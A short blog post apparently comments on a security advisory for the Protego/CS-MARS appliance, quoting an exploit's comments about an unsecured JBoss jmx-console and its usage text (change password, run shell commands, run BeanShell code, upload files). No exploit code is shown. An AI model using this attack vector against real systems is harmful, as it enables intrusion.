So last month I blogged on J2EE Application stack complexity and the Protego/CS-MARS advisory yesterday provides a graphic example these issues in a commercial security product:

From the exploit comments (I’ll let you find it yourself)

# Unfortunately, little or no effort was put in to securing the JBoss # installation as per the JBoss community's recommended best practices. # A such, the usual set of JBoss interfaces are wide open and it is up to # the attacker how creative they want to be in compromising the box.  This # particular exploit vector abuses the JBoss jmx-console for all sorts of # fun.

Having been playing around with Java scripting languages lately, I found the exploit which included upload (and execution) of Beanshell code quite interesting.

(Of course who needs beanshell when you’ve got a real shell, but it is the thought that counts!)

Extended Usage: Change password: $0  pass Run shell command: $0  cmd Run BeanShell code: $0  bsh /path/to/file/with/beanshell Upload files: $0  upload   []